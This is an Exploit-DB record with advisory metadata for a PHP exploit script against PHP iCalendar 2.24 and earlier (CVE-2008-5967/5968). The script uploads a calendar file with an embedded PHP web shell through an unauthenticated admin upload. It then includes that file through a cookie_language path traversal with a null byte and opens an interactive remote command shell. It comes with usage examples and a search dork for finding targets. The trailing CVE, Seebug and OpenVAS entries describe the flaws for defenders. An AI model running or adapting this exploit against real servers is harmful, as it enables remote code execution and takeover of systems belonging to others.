{"bulletinFamily": "exploit", "id": "EDB-ID:6519", "cvelist": ["CVE-2008-5967", "CVE-2008-5968"], "modified": "2008-09-21T00:00:00", "lastseen": "2016-02-01T00:02:20", "edition": 1, "sourceData": "<?php\n\n/*\n\t-----------------------------------------------------------------\n\tPHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit\n\t-----------------------------------------------------------------\n\t\n\tauthor...: EgiX\n\tmail.....: n0b0d13s[at]gmail[dot]com\n\t\n\tlink.....: http://phpicalendar.net/\n\tdork.....: \"Powered by PHP iCalendar\"\n\t\n\t[-] vulnerable code in /admin/index.php\n\t\n\t65.\t// Add or Update a calendar\n\t66.\t$addupdate_msg \t= '';\n\t67.\tif ((isset($_POST['action'])) && ($_POST['action'] == 'addupdate')) {\n\t68.\t\tfor ($filenumber = 1; $filenumber < 6; $filenumber++) {\n\t69.\t\t\t$file = $_FILES['calfile'];\n\t70.\t\t\t$addupdate_success = FALSE;\n\t71.\t\n\t72.\t\t\tif (!is_uploaded_file_v4($file['tmp_name'][$filenumber])) {\n\t73.\t\t\t\t$upload_error = get_upload_error($file['error'][$filenumber]);\n\t74.\t\t\t} elseif (!is_uploaded_ics($file['name'][$filenumber])) {\n\t75.\t\t\t\t$upload_error = $upload_error_type_lang;\n\t76.\t\t\t} elseif (!copy_cal($file['tmp_name'][$filenumber], $file['name'][$filenumber])) {\n\t77.\t\t\t\t$upload_error = $copy_error_lang . \" \" . $file['tmp_name'][$filenumber] . \" - \" . $calendar_path . \"/\" . $file['name'][$filenumber];\n\t78.\t\t\t} else {\n\t79.\t\t\t\t$addupdate_success = TRUE;\n\t80.\t\t\t}\n\t81.\t\t\t\n\t82.\t\t\tif ($addupdate_success == TRUE) {\n\t83.\t\t\t\t$addupdate_msg = $addupdate_msg . '<font color=\"green\">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_action_success'].'</font><br />';\n\t84.\t\t\t} else {\n\t85.\t\t\t\t$addupdate_msg = $addupdate_msg . '<font color=\"red\">'.$lang['l_cal_file'].' #'.$filenumber.': '.$lang['l_upload_error'].'</font><br />';\n\t86.\t\t\t}\n\t87.\t\t}\n\t88.\t}\n\t\n\trestricted access to this script isn't properly realized, so an attacker might be able to upload a calendar file\n\t(with .ics extension) into /calendars directory...multiple file extensions isn't checked, but 'ics' is generally\n\trecognized as text/calendar MIME type by most servers...so this poc try to include the uploaded file using the\n\tsame LFI bug found by rgod (http://retrogod.altervista.org/phpical_221_incl_xpl.html), that isn't still patched!\n*/\n\nerror_reporting(0);\nset_time_limit(0);\nini_set(\"default_socket_timeout\", 5);\n\ndefine(STDIN, fopen(\"php://stdin\", \"r\"));\n\nfunction http_send($host, $packet)\n{\n\t$sock = fsockopen($host, 80);\n\twhile (!$sock)\n\t{\n\t\tprint \"\\n[-] No response from {$host}:80 Trying again...\";\n\t\t$sock = fsockopen($host, 80);\n\t}\n\tfputs($sock, $packet);\n\twhile (!feof($sock)) $resp .= fread($sock, 1024);\n\tfclose($sock);\n\treturn $resp;\n}\n\nprint \"\\n+---------------------------------------------------------------------------+\";\nprint \"\\n| PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit by EgiX |\";\nprint \"\\n+---------------------------------------------------------------------------+\\n\";\n\nif ($argc < 3)\n{\n\tprint \"\\nUsage......: php $argv[0] host path\\n\";\n\tprint \"\\nExample....: php $argv[0] localhost /\";\n\tprint \"\\nExample....: php $argv[0] localhost /phpicalendar/\\n\";\n\tdie();\n}\n\n$host = $argv[1];\n$path = $argv[2];\n\n$payload = \"--o0oOo0o\\r\\n\";\n$payload .= \"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\n\";\n$payload .= \"addupdate\\r\\n\";\n$payload .= \"--o0oOo0o\\r\\n\";\n$payload .= \"Content-Disposition: form-data; name=\\\"calfile[1]\\\"; filename=\\\"fake_cal.ics\\\"\\r\\n\\r\\n\";\n$payload .= \"BEGIN:VCALENDAR\\n<?php \\${print(_code_)}.\\${passthru(base64_decode(\\$_SERVER[HTTP_CMD]))}.\\${die()} ?>\\r\\n\";\n$payload .= \"--o0oOo0o--\\r\\n\";\n\n$packet = \"POST {$path}admin/index.php HTTP/1.0\\r\\n\";\n$packet .= \"Host: {$host}\\r\\n\";\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\n$packet .= \"Connection: close\\r\\n\\r\\n\";\n$packet .= $payload;\n\t\nhttp_send($host, $packet);\n\n$packet = \"GET {$path}preferences.php?action=setcookie HTTP/1.0\\r\\n\";\n$packet .= \"Host: {$host}\\r\\n\";\n$packet .= \"Connection: close\\r\\n\\r\\n\";\n\npreg_match(\"/Set-Cookie: (phpicalendar_[^=]*)=/\", http_send($host, $packet), $cookie);\n\n$data = urlencode(serialize(array(\"cookie_language\" => \"../calendars/fake_cal.ics\".chr(0))));\n\nwhile(1)\n{\n\tprint \"\\nphpicalendar-shell# \";\n\t$cmd = trim(fgets(STDIN));\n\tif ($cmd != \"exit\")\n\t{\n\t\t$packet = \"GET {$path}print.php HTTP/1.0\\r\\n\";\n\t\t$packet .= \"Host: {$host}\\r\\n\";\n\t\t$packet .= \"Cookie: {$cookie[1]}={$data}\\r\\n\";\n\t\t$packet .= \"Cmd: \".base64_encode($cmd).\"\\r\\n\";\n\t\t$packet .= \"Connection: close\\r\\n\\r\\n\";\n\t\t$output = http_send($host, $packet);\n\t\t$shell = explode(\"_code_\", $output);\n\t\tpreg_match(\"/_code_/\", $output) ? print \"\\n{$shell[1]}\" : die(\"\\n[-] Exploit failed...\\n\");\n\t}\n\telse break;\n}\n\n?>\n\n# milw0rm.com [2008-09-21]\n", "published": "2008-09-21T00:00:00", "href": "https://www.exploit-db.com/exploits/6519/", "osvdbidlist": ["48654", "51602"], "reporter": "EgiX", "hash": "da4926f3c12dddc761198c2553718591c17fd564dd99b313d6370c170005c349", "title": "PHP iCalendar <= 2.24 cookie_language LFI / File Upload Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit. CVE-2008-5967,CVE-2008-5968. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6519/"}

{"result": {"cve": [{"id": "CVE-2008-5967", "type": "cve", "title": "CVE-2008-5967", "description": "admin/index.php in PHP iCalendar 2.3.4, 2.24, and earlier does not require administrative authentication for an addupdate action, which allows remote attackers to upload a calendar (aka .ics) file with arbitrary content to the calendars/ directory outside the web root.", "published": "2009-01-26T15:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5967", "cvelist": ["CVE-2008-5967"], "lastseen": "2016-09-03T11:33:34"}, {"id": "CVE-2008-5968", "type": "cve", "title": "CVE-2008-5968", "description": "Directory traversal vulnerability in print.php in PHP iCalendar 2.24 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cookie_language parameter in a phpicalendar_* cookie, a different vector than CVE-2006-1292.", "published": "2009-01-26T15:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5968", "cvelist": ["CVE-2008-5968"], "lastseen": "2016-09-03T11:33:35"}], "seebug": [{"id": "SSV-65734", "type": "seebug", "title": "PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit", "description": "Summary: \nPHP iCalendar 2.3.4, the 2.24 and prior versions of the admin/index. php does not require to increase the update operation to manage authentication, which allows a remote attacker can upload an arbitrary content to the calendar file(also known as. ics)to the web root outside of the calendars/directory.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-65734", "cvelist": ["CVE-2008-5967"], "lastseen": "2016-07-30T01:09:05"}], "openvas": [{"id": "OPENVAS:900199", "type": "openvas", "title": "Multiple Vulnerabilities in PHP iCalendar", "description": "This host is running PHP iCalendar and is prone to multiple\n vulnerabilities.", "published": "2009-01-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900199", "cvelist": ["CVE-2008-5967", "CVE-2008-5968"], "lastseen": "2017-02-01T09:02:28"}]}}